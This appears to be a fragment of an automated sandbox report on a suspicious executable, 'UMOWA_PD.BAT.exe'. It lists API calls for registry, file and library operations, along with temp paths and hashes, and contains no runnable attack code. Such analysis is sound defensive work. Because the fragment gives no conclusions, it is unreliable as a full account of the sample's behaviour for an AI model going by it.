                                                                                    • Opcode Fuzzy Hash: 0fe20a848d4a285c173513a47146d0bdd1f0b43cc80ef0beb9e6d9777ffbd6ad
                                                                                    • Instruction Fuzzy Hash: 5051FB75D0421AABDF249FD4CA84AAEBB79FF04344F10817BE901B62D0D7B49D828B58

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountTick$wsprintf
                                                                                    • String ID: ... %d%%
                                                                                    • API String ID: 551687249-2449383134

                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
                                                                                    • wsprintfW.USER32 ref: 004068F7
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040690B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                    • String ID: %s%S.dll$UXTHEME
                                                                                    • API String ID: 2200240437-1106614640

                                                                                    APIs
                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseEnum$DeleteValue
                                                                                    • String ID:
                                                                                    • API String ID: 1354259210-0

                                                                                    APIs
                                                                                      • Part of subcall function 6FE21BFF: GlobalFree.KERNEL32(?), ref: 6FE21E74
                                                                                      • Part of subcall function 6FE21BFF: GlobalFree.KERNEL32(?), ref: 6FE21E79
                                                                                      • Part of subcall function 6FE21BFF: GlobalFree.KERNEL32(?), ref: 6FE21E7E
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6FE218C5
                                                                                    • FreeLibrary.KERNEL32(?), ref: 6FE2194B
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6FE21970
                                                                                      • Part of subcall function 6FE2243E: GlobalAlloc.KERNEL32(00000040,?), ref: 6FE2246F
                                                                                      • Part of subcall function 6FE22810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6FE21896,00000000), ref: 6FE228E0
                                                                                      • Part of subcall function 6FE21666: wsprintfW.USER32 ref: 6FE21694
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15222039276.000000006FE21000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FE20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15221966825.000000006FE20000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000000.00000002.15222110605.000000006FE24000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000000.00000002.15222184730.000000006FE26000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6fe20000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 3962662361-3916222277

                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 0040605E
                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004034FA,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6), ref: 00406079
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountFileNameTempTick
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                    • API String ID: 1716503409-944333549
                                                                                    APIs
                                                                                    • RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,Call,?,00000000,00406660,80000002), ref: 00406435
                                                                                    • RegCloseKey.KERNELBASE(?), ref: 00406440
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseQueryValue
                                                                                    • String ID: Call
                                                                                    • API String ID: 3356406503-1824292864
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4946c792fe510ceb6f898f1d350858136886e798b9c642bfd65d449563e2a9d8
                                                                                    • Instruction ID: bb56daa647bdc5b8eebe4baaa8fd529e9884befb34821132b6d53cadc5dab3c5
                                                                                    • Opcode Fuzzy Hash: 4946c792fe510ceb6f898f1d350858136886e798b9c642bfd65d449563e2a9d8
                                                                                    • Instruction Fuzzy Hash: 84814571E04228DBDF24CFA8C844BADBBB1FF44305F24816AD456BB281D778A986DF05
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
                                                                                    • Instruction ID: 4c059968f2e2b24eb1e5e0c9ef09b3253d11b2009d36a285a9eb138ea7c1b005
                                                                                    • Opcode Fuzzy Hash: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
                                                                                    • Instruction Fuzzy Hash: 5B815971E04228DBDF24CFA8C8447ADBBB0FF44305F20816AD456BB281D7786986DF45
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
                                                                                    • Instruction ID: d60cf97a253a7e6a69b3ee1887f4eadeccf904993e12f72ad3f9abe973951288
                                                                                    • Opcode Fuzzy Hash: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
                                                                                    • Instruction Fuzzy Hash: A1711371E04228DBDF24CFA8C844BADBBB1FF44305F15806AD856BB281D778A986DF45
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c11de4171378e898cf9dd0cf6cc2122b5d0c7e9a287f85b53884598f27a71e29
                                                                                    • Instruction ID: 85b777fa610547d2183482adb232412925907ddbdaa1129d6a49a25a13354a82
                                                                                    • Opcode Fuzzy Hash: c11de4171378e898cf9dd0cf6cc2122b5d0c7e9a287f85b53884598f27a71e29
                                                                                    • Instruction Fuzzy Hash: 9D714671E04228DBDF28CF98C844BADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f1fa58480ac5da56fa6cc6281bf6ff7b0f773126a89d504887f275dca7af18c3
                                                                                    • Instruction ID: 068c41ea6699cb9b24c5d93e390f6e15a746ef4a0ce6273c00671ddd4a3661d6
                                                                                    • Opcode Fuzzy Hash: f1fa58480ac5da56fa6cc6281bf6ff7b0f773126a89d504887f275dca7af18c3
                                                                                    • Instruction Fuzzy Hash: E0715771E04228DBDF24CF98C844BADBBB1FF44305F15806AD856BB281C778AA86DF45
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00402108
                                                                                      • Part of subcall function 004055A6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                                                      • Part of subcall function 004055A6: lstrlenW.KERNEL32(004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                                                      • Part of subcall function 004055A6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,004033F2,004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405601
                                                                                      • Part of subcall function 004055A6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll), ref: 00405613
                                                                                      • Part of subcall function 004055A6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                                                      • Part of subcall function 004055A6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                                                      • Part of subcall function 004055A6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00402119
                                                                                    • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,?,000000F0), ref: 00402196
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                    • String ID:
                                                                                    • API String ID: 334405425-0
                                                                                    APIs
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00401C10
                                                                                    • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C22
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Global$AllocFree
                                                                                    • String ID: Call
                                                                                    • API String ID: 3394109436-1824292864
                                                                                    APIs
                                                                                      • Part of subcall function 0040687E: FindFirstFileW.KERNELBASE(?,00425F58,C:\Users\user\AppData\Local\Temp\nscE8.tmp,00405F41,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp,00000000,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp, 4v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76E63420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                                                                      • Part of subcall function 0040687E: FindClose.KERNEL32(00000000), ref: 00406895
                                                                                    • lstrlenW.KERNEL32 ref: 00402344
                                                                                    • lstrlenW.KERNEL32(00000000), ref: 0040234F
                                                                                    • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402378
                                                                                    Similarity
                                                                                    • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                    • String ID:
                                                                                    • API String ID: 1486964399-0
                                                                                    APIs
                                                                                    • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D6
                                                                                    • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E9
                                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nscE8.tmp,00000000,00000011,00000002), ref: 00402602
                                                                                    Similarity
                                                                                    • API ID: Enum$CloseValue
                                                                                    • String ID:
                                                                                    • API String ID: 397863658-0
                                                                                    • Opcode ID: ba34c4ace152f4771e18115f26e31f873f7731feb8842bd8527d51c3f02d9afa
                                                                                    • Instruction ID: fdeb1b79bd1b5feb028a75c257e649ad2cddb418c0fd83a6570d1db0005c2465
                                                                                    • Opcode Fuzzy Hash: ba34c4ace152f4771e18115f26e31f873f7731feb8842bd8527d51c3f02d9afa
                                                                                    • Instruction Fuzzy Hash: 7D017171904205BFEB149F949E58AAF7678FF40308F10443EF505B61C0DBB84E41976D
                                                                                    APIs
                                                                                      • Part of subcall function 00405E9B: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nscE8.tmp,?,00405F0F,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp, 4v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76E63420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405EA9
                                                                                      • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
                                                                                      • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6
                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                                                      • Part of subcall function 00405A75: CreateDirectoryW.KERNELBASE(?,?), ref: 00405AB7
                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,00435000,?,00000000,000000F0), ref: 00401652
                                                                                    Similarity
                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                    • String ID:
                                                                                    • API String ID: 1892508949-0
                                                                                    • Opcode ID: 4b68a463cc784b1945903bcff3764fd9da93cf801788bc1ee3673f5490bf8ecc
                                                                                    • Instruction ID: ceaefb5432ba9a2b041ab88b04bec91c1a8495824eafa6d8534a6d53eb807851
                                                                                    • Opcode Fuzzy Hash: 4b68a463cc784b1945903bcff3764fd9da93cf801788bc1ee3673f5490bf8ecc
                                                                                    • Instruction Fuzzy Hash: 2D11D031504604ABCF206FA5CD4099F36B0EF04368B29493FE941B22E1DA3E4E819E8E
                                                                                    APIs
                                                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402560
                                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nscE8.tmp,00000000,00000011,00000002), ref: 00402602
                                                                                    Similarity
                                                                                    • API ID: CloseQueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 3356406503-0
                                                                                    • Opcode ID: 56531dfc69c8a788bac7fcb245dee4885a6b683f52a9ec3ede9407be23b67ed3
                                                                                    • Instruction ID: b0e4e1b430255f92fa12a8c2637aeeefdc8d450e0dea4cce8f1fdd2cec8de2f5
                                                                                    • Opcode Fuzzy Hash: 56531dfc69c8a788bac7fcb245dee4885a6b683f52a9ec3ede9407be23b67ed3
                                                                                    • Instruction Fuzzy Hash: 61116A71900219EBDF14DFA0DA989AEB7B4BF04349F20447FE406B62C0D7B84A45EB5E
                                                                                    APIs
                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                    • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                                                    • Instruction ID: 2b867b2a322a557ec20ecaa395e060e0be7e2a6973b32d365fcb6e947ad1390c
                                                                                    • Opcode Fuzzy Hash: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                                                    • Instruction Fuzzy Hash: 9E01F4327242209BE7195B389D05B6B3798E710314F10863FF855F66F1DA78CC429B4C
                                                                                    APIs
                                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040245B
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00402464
                                                                                    Similarity
                                                                                    • API ID: CloseDeleteValue
                                                                                    • String ID:
                                                                                    • API String ID: 2831762973-0
                                                                                    • Opcode ID: 729ecf5bba26eed59db8e40ba0825d20aa39ecfc350fd83ab66bb719c7a4b8e3
                                                                                    • Instruction ID: 823524eaaa32c5521ce5516f6f818df3cdafdbc5371ac3c1d9ba599ed9425974
                                                                                    • Opcode Fuzzy Hash: 729ecf5bba26eed59db8e40ba0825d20aa39ecfc350fd83ab66bb719c7a4b8e3
                                                                                    • Instruction Fuzzy Hash: 46F06232A04520ABDB10BBA89A8DAEE62B5AF54314F11443FE502B71C1CAFC4D02976D
                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNELBASE(?,?), ref: 00405AB7
                                                                                    • GetLastError.KERNEL32 ref: 00405AC5
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1375471231-0
                                                                                    • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                                                    • Instruction ID: 25953aab165e2e3bb2b5eb59dc1d6ee29197e23c9d0e5a802ce790cbbbfebc39
                                                                                    • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                                                    • Instruction Fuzzy Hash: 33F0F4B1D1060EDADB00DFA4C6497EFBBB4AB04309F04812AD941B6281D7B982488FA9
                                                                                    APIs
                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 00401F01
                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00401F0C
                                                                                    Similarity
                                                                                    • API ID: Window$EnableShow
                                                                                    • String ID:
                                                                                    • API String ID: 1136574915-0
                                                                                    • Opcode ID: b342668e68410e2d968fedd3eb79c8682b657b25800b9077b5ecd2124e99ac37
                                                                                    • Instruction ID: a6cb0e5ea3b461fc76251f348ffd86be0a73501dc920cd99368f231d5504fafc
                                                                                    • Opcode Fuzzy Hash: b342668e68410e2d968fedd3eb79c8682b657b25800b9077b5ecd2124e99ac37
                                                                                    • Instruction Fuzzy Hash: F2E09A36A082049FE705EBA8AE484AEB3B0EB40325B200A7FE001F11C0CBB94C00866C
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406942
                                                                                      • Part of subcall function 004068A5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
                                                                                      • Part of subcall function 004068A5: wsprintfW.USER32 ref: 004068F7
                                                                                      • Part of subcall function 004068A5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040690B
                                                                                    Similarity
                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2547128583-0
                                                                                    • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                    • Instruction ID: 5852e889d14e736f2df1098d3b7202b06462132acdc852f75f804bf3a6ff6809
                                                                                    • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                    • Instruction Fuzzy Hash: FCE08673604310EBD61056755D04D2773A8AF95A50302483EFD46F2144D738DC32A66A
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\UMOWA_PD.BAT.exe,80000000,00000003), ref: 00406015
                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406037
                                                                                    Similarity
                                                                                    • API ID: File$AttributesCreate
                                                                                    • String ID:
                                                                                    • API String ID: 415043291-0
                                                                                    • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                    • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                                                    • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                    • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5
                                                                                    • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405AE3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1375471231-0
                                                                                    • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                    • Instruction ID: c141ebc68f4164d0a3663fa1b1ea49181af819f28e12deb644bc081b11005b13
                                                                                    • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                    • Instruction Fuzzy Hash: 5DC08C30300A02DACF000B218F087073950AB00380F19483AA582E00A0CA308044CD2D
                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028B4
                                                                                      • Part of subcall function 00406468: wsprintfW.USER32 ref: 00406475
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: FilePointerwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 327478801-0
                                                                                    • Opcode ID: c408762c6ae6a09676534d13277c6868af0c4062816ce02b100207dfef7a20c8
